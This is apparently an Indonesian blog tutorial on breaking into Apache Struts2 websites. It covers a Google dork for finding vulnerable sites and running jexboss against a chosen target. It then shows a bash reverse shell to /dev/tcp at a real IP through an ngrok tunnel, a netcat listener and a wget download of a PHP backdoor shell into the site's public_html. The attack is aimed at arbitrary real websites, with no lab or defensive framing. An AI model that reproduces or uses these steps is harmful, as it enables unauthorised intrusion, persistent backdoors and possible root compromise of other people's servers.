Tutorial Remote Code Execution (Apache Struts2)

Hallo Pada kesempatan kali ini RCE lagi dan ini untuk versi Apache Struts 2
Langsung saja cekidot!!!

Remote Code Execution Apache Struts2 

Bahan-bahan nya :
-Dork : intitle:"Struts Problem Report" intext:"development mode is enabled."
Python >> Download Disini
Jexboss >> Download Disini
Netcat >> Download Disini

Extrack semuanya

1. Langkah pertama pastinya dorking di google.com
dengan dork di atas atau di bawah ini (sama aja asw-_-)

intitle:"Struts Problem Report" intext:"development mode is enabled."
dan pilih salah satu website


2. Kemudian buka command prompt lalu ke folder jexboss nya



3. Yang ketiga ketikan:
python jexboss.py -u urltarger/bla/.com 
kalau tidak bisa pythonnya hapus jadi jexboss.py -u urltarger/bla/.com
kemudian enter, dan jika ada tulisan VULNERABLE pada struts2 maka web tersebut vuln
Kemudian ketik yes



4. Lalu setelah klik yes tadi, tinggalkan sejenak jexbossnya dan buka cmd baru kemudian arahkan pada file ngrok yang tadi anda download jangan lupa regist dulu di https://ngrok.com/
Lalu ketikan:
ngrok.exe tcp 123
lalu enter

Tampilan ngrok Setelah di Enter


5. setelah tersambung kemudian buka cmd lagi dan arahkan pada folder netcat nya
lalu ketikan:
nc -lnvp 123
kemudian enter


 6. Setelah itu kembali lagi pada cmd yang jexboss tadi lalu ketikan:
/bin/bash -i > /dev/tcp/52.15.62.13/port anda yang di ngrok 0>&1 2>&1\n
contoh punya saya:
/bin/bash -i > /dev/tcp/52.15.62.13/14413 0>&1 2>&1\n
Lalu enter


7. Setelah di enter, buka cmd yang tadi listening 123 (nc-lnvp 123)
Lalu coba anda ketikan perintah uname -a lalu enter
maka hasilnya akan seperti ini


Oke baiklah dengan begini anda sudah masuk pada direktory web tersebut,
coba anda ketik ls maka akan tampil directory nya, apabila anda ingin memasang shell backdoor anda bisa memakai perintah wget https://webygadashellnya.com/shelanda.php
dan arahkan pada public_html web tersebut. ketik saja cd / maka anda akan berada pada directory awal, dan kalo hokki bisa di root severnya
Sekian TerimaKasih
 

SHARE THIS

Author:

Previous Post
Next Post